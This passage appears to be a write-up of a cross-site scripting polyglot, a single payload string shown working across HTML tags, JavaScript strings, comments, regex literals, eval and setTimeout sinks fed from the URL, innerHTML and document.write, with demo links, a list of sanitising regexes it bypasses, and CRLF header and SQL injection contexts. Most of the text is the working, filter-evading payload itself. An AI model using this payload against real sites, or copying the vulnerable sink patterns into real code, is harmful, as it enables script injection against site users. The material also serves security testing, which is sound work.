Demo: jsbin.com/feziyi

HTML comments:
<!--

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

-->
Demo: jsbin.com/taqizu

Arbitrary common HTML tags:
<title>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</title>
Demo: jsbin.com/juzuvu

<style>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</style>
Demo: jsbin.com/qonawa

<textarea>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</textarea>
Demo: jsbin.com/mecexo

<div>

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</div>
Demo: jsbin.com/wuvumuh

Script contexts covered:
Double-quoted strings:
var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
Demo: jsbin.com/coteco

Single-quoted strings:
var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e';
Demo: jsbin.com/bupera

Template strings/literals (ES6):
String.raw`jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e`;
Demo: jsbin.com/rewapay

Regular expression literals:
var re = /jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e/;
Demo: jsbin.com/zepiti

Single-line and multi-line comments:
<script>

//jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

</script>
Demo: jsbin.com/fatorag

<script>
/*

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

*/
</script>
Demo: jsbin.com/vovogo

JS sinks:
eval:
eval(location.hash.slice(1));
Demo: https://jsbin.com/qejisu#jaVasCript:/*-/*%60/%5C%60/*'/%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e

setTimeout:
setTimeout(location.search.slice(1));
Demo: https://jsbin.com/qawusa?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e

setInterval:
setInterval(location.search.slice(1));
Demo: https://jsbin.com/colese?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e

Function:
new Function(location.search.slice(1))();
Demo: https://jsbin.com/hizemi?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e

innerHTML/outerHTML and document.write with HTML-escaped strings:
var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";
document.documentElement.innerHTML = data;
Demo: jsbin.com/nimokaz

var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";
document.head.outerHTML = data;
Demo: jsbin.com/yowivo

var data = "jaVasCript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e";
document.write(data);
document.close();
Demo: jsbin.com/ruhofi

Event handlers with HTML-escaped values:
<svg onload="

void 'javascript:/*-/*`/*\`/*&#039;/*&quot;/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//&lt;/stYle/&lt;/titLe/&lt;/teXtarEa/&lt;/scRipt/--!&gt;\x3csVg/&lt;sVg/oNloAd=alert()//&gt;\x3e';

"></svg>
Demo: jsbin.com/puboha

Filter evasion:
As you might have already noticed, the polyglot has been crafted with filter evasion in mind. For instance:

jaVasCript:, oNcliCk=, et al. bypasses:
preg_replace('/\b(?:javascript:|on\w+=)/', '', PAYLOAD);
/*`/*\` bypasses:
preg_replace('/`/', '\`', PAYLOAD);
</stYle/</titLe/</teXtarEa/</scRipt/--!> bypasses:
preg_replace('/<\/\w+>/', '', PAYLOAD);
--!> bypasses:
preg_replace('/-->/', '', PAYLOAD);
<sVg/oNloAd=alert()//> bypasses:
preg_replace('/<\w+\s+/', '', PAYLOAD);
Bonus attacking contexts covered:
CRLF-based XSS:
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2016 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: x=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//

//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
Error-based SQL injections (yes, SQLi!):
SELECT * FROM Users WHERE Username='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'
SELECT * FROM Users WHERE Username="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e"